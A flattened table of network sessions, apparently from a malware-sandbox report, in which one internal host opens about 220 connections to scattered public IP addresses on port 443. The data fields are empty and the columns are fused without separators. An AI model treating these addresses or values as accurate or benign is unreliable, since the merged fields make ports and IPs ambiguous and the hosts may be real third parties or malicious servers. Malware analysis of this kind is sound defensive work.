                                        19929192.168.2.1341556121.4.113.231443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19930192.168.2.134260286.30.131.207443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19931192.168.2.1355262142.9.85.201443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19932192.168.2.1344348171.178.78.92443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19933192.168.2.1348318203.138.163.223443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19934192.168.2.1344286176.167.144.62443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19935192.168.2.1353988161.125.243.156443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19936192.168.2.133585047.73.36.36443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19937192.168.2.133564877.50.7.86443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19938192.168.2.135381025.244.245.250443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19939192.168.2.135423450.255.92.63443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19940192.168.2.1349418157.16.70.112443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19941192.168.2.1342258185.11.157.94443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19942192.168.2.1343438105.183.111.190443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19943192.168.2.1345688146.179.242.126443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19944192.168.2.1340952146.235.12.47443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19945192.168.2.135984865.14.106.27443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19946192.168.2.1338830223.235.153.146443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19947192.168.2.134884257.182.76.27443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19948192.168.2.135205842.167.43.252443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19949192.168.2.1353518123.23.119.38443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19950192.168.2.135223096.2.246.122443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19951192.168.2.135324059.248.31.123443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19952192.168.2.1343610157.202.231.17443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19953192.168.2.135543440.134.67.31443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19954192.168.2.133342675.126.57.170443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19955192.168.2.1351336136.215.174.83443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19956192.168.2.134820091.250.166.188443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19957192.168.2.1336656194.75.2.138443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19958192.168.2.1351676152.196.215.100443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19959192.168.2.134248697.254.214.238443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19960192.168.2.134986241.227.4.159443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19961192.168.2.1341598138.160.50.39443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19962192.168.2.1346402126.32.210.191443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19963192.168.2.134835465.120.182.144443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19964192.168.2.1358758218.87.19.47443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19965192.168.2.135681088.156.39.182443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19966192.168.2.135274275.140.175.249443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19967192.168.2.133461025.136.4.17443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19968192.168.2.1339706206.19.15.243443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19969192.168.2.134820860.146.212.213443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19970192.168.2.1357046144.12.239.174443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19971192.168.2.135706442.214.225.19443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19972192.168.2.13364982.3.23.79443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19973192.168.2.136098035.109.43.159443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19974192.168.2.1341952141.52.233.161443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19975192.168.2.135647690.158.224.210443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19976192.168.2.133311836.202.130.198443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19977192.168.2.1360100103.25.57.255443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19978192.168.2.1337286121.137.182.36443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19979192.168.2.1352506195.143.173.195443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19980192.168.2.135180417.148.197.195443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19981192.168.2.134487667.68.173.139443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19982192.168.2.134939891.46.152.126443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19983192.168.2.133655818.49.172.61443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19984192.168.2.133439673.241.195.129443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19985192.168.2.133305270.50.126.22443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19986192.168.2.1337268108.171.107.126443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19987192.168.2.1345938169.131.37.131443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19988192.168.2.135582494.57.157.155443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19989192.168.2.1357172206.140.166.175443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19990192.168.2.133913817.94.43.152443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19991192.168.2.1352020143.160.135.159443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19992192.168.2.1353658106.220.76.238443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19993192.168.2.1355896184.69.108.228443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19994192.168.2.1332928100.22.2.131443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19995192.168.2.1347630131.13.23.43443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19996192.168.2.1352204103.8.149.154443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19997192.168.2.1357780106.175.102.34443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19998192.168.2.1354082202.149.7.98443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19999192.168.2.1357044111.214.252.69443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20000192.168.2.1352126165.81.101.32443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20001192.168.2.1334032209.218.124.40443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20002192.168.2.1334226158.180.249.108443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20003192.168.2.1359142166.76.237.114443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20004192.168.2.133669093.139.121.108443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20005192.168.2.133843024.43.6.155443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20006192.168.2.1353958155.34.81.202443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20007192.168.2.134669279.215.71.171443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20008192.168.2.134716697.97.51.188443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20009192.168.2.1348196152.209.70.13443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20010192.168.2.1352396125.71.51.221443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20011192.168.2.1342900123.228.93.6443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20012192.168.2.1360596216.135.66.117443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20013192.168.2.1346384134.252.136.152443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20014192.168.2.1346220102.4.32.2443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20015192.168.2.134521287.250.199.205443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20016192.168.2.1345404175.58.64.142443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20017192.168.2.1341236204.110.53.163443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20018192.168.2.1359664165.113.192.198443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20019192.168.2.135668023.236.126.159443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20020192.168.2.1341288128.31.20.149443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20021192.168.2.1336002208.33.134.2443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20022192.168.2.135517861.146.37.202443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20023192.168.2.1356174170.110.177.16443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20024192.168.2.133349057.140.14.15443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20025192.168.2.134254417.111.45.127443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20026192.168.2.1335286160.91.173.240443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20027192.168.2.134002051.76.132.177443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20028192.168.2.1359996203.216.121.102443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20029192.168.2.134268297.72.29.225443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20030192.168.2.1351476134.251.32.37443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20031192.168.2.134758012.5.107.191443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20032192.168.2.1344390194.164.237.187443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20033192.168.2.134517250.225.157.112443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20034192.168.2.134567294.221.152.108443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20035192.168.2.135248883.54.79.70443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20036192.168.2.1347824174.23.227.112443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20037192.168.2.134240688.188.174.128443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20038192.168.2.1348228205.39.81.91443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20039192.168.2.134467831.51.9.232443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20040192.168.2.13557002.255.119.87443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20041192.168.2.135141241.76.69.183443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20042192.168.2.1352374190.107.205.9443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20043192.168.2.134183227.114.86.134443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20044192.168.2.1336230101.223.123.234443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20045192.168.2.134758092.170.76.0443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20046192.168.2.1343308193.170.125.242443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20047192.168.2.135485275.125.10.10443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20048192.168.2.135074045.66.21.151443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20049192.168.2.1336188186.27.63.240443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20050192.168.2.1346338126.158.5.187443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20051192.168.2.1359712119.217.73.0443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20052192.168.2.134158447.230.4.4443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20053192.168.2.135527651.22.136.217443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20054192.168.2.134648683.36.82.77443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20055192.168.2.133719290.42.236.81443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20056192.168.2.135303219.253.65.170443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20057192.168.2.1349710144.71.12.99443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20058192.168.2.1341938102.2.83.95443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20059192.168.2.1333086188.30.38.102443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20060192.168.2.135791053.172.85.36443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20061192.168.2.1359214132.240.60.156443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20062192.168.2.1334916195.68.182.252443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20063192.168.2.1348880217.253.236.131443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20064192.168.2.1348240223.233.20.167443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20065192.168.2.133540479.32.62.127443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20066192.168.2.1337656222.28.197.111443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20067192.168.2.134935259.221.99.114443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20068192.168.2.135016652.188.38.251443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20069192.168.2.1337536108.16.198.191443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20070192.168.2.135294285.71.200.194443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20071192.168.2.135094666.46.64.16443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20072192.168.2.1336670156.36.23.159443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20073192.168.2.134596093.76.236.206443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20074192.168.2.135789441.172.243.222443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20075192.168.2.13446921.61.61.87443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20076192.168.2.1351942116.30.227.93443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20077192.168.2.1340240174.116.244.169443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20078192.168.2.134718247.103.236.202443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20079192.168.2.133975294.206.141.49443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20080192.168.2.1350014171.87.236.60443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20081192.168.2.133835817.34.187.248443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20082192.168.2.134726259.180.216.205443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20083192.168.2.1346424164.176.199.136443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20084192.168.2.133317852.52.22.235443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20085192.168.2.1346554165.159.175.15443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20086192.168.2.13497245.109.23.143443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20087192.168.2.133599289.131.192.132443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20088192.168.2.1360448108.103.214.183443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20089192.168.2.13531502.176.113.204443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20090192.168.2.1360892114.97.107.122443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20091192.168.2.1340710155.17.101.226443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20092192.168.2.1332770146.13.84.203443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20093192.168.2.1356296104.4.59.167443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20094192.168.2.135546232.168.35.166443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20095192.168.2.1340476178.5.22.220443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20096192.168.2.1340592160.54.238.242443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20097192.168.2.1345694146.9.96.182443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20098192.168.2.135232281.252.97.178443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20099192.168.2.1348276220.159.98.93443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20100192.168.2.1358548158.20.183.158443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20101192.168.2.1358630120.237.34.222443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20102192.168.2.1348804126.182.39.31443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20103192.168.2.1355888110.12.2.215443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20104192.168.2.1357456134.58.227.87443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20105192.168.2.1337518110.227.84.19443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20106192.168.2.1347788194.255.209.148443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20107192.168.2.133430691.10.188.99443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20108192.168.2.135364072.194.175.218443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20109192.168.2.133736264.214.140.103443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20110192.168.2.1346772138.176.182.141443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20111192.168.2.1344022142.23.43.244443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20112192.168.2.134724443.253.4.50443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20113192.168.2.134001264.115.251.60443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20114192.168.2.1352760103.6.19.63443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20115192.168.2.1341278156.21.103.66443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20116192.168.2.1357430131.130.92.87443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20117192.168.2.134425496.110.158.72443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20118192.168.2.133737024.23.124.30443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20119192.168.2.1354742118.54.255.237443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20120192.168.2.133682234.109.84.128443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20121192.168.2.1360052193.39.67.143443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20122192.168.2.1338356114.240.183.161443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20123192.168.2.135875053.45.241.115443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20124192.168.2.1342606211.170.190.162443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20125192.168.2.1345368126.19.235.110443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20126192.168.2.1350458197.101.145.34443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20127192.168.2.1358930117.98.96.200443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20128192.168.2.1350984209.139.212.97443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20129192.168.2.1350696168.86.233.184443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20130192.168.2.1358350140.105.228.135443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20131192.168.2.135509485.82.219.129443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20132192.168.2.134366450.239.121.110443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20133192.168.2.135841869.184.113.238443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20134192.168.2.1359868123.158.122.47443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20135192.168.2.136050297.12.142.225443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20136192.168.2.13483368.13.241.75443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20137192.168.2.136014047.140.95.169443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20138192.168.2.134741098.147.137.196443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20139192.168.2.1337804135.126.240.178443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20140192.168.2.1358970186.190.26.167443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20141192.168.2.134895888.245.203.172443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20142192.168.2.1358310138.214.173.240443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20143192.168.2.134123867.196.136.107443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20144192.168.2.1334190209.212.7.245443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20145192.168.2.13472401.67.207.148443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20146192.168.2.135452452.40.121.54443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20147192.168.2.134053071.108.229.32443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20148192.168.2.1340978150.129.2.188443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20149192.168.2.135285061.156.53.158443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20150192.168.2.133684645.8.246.92443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
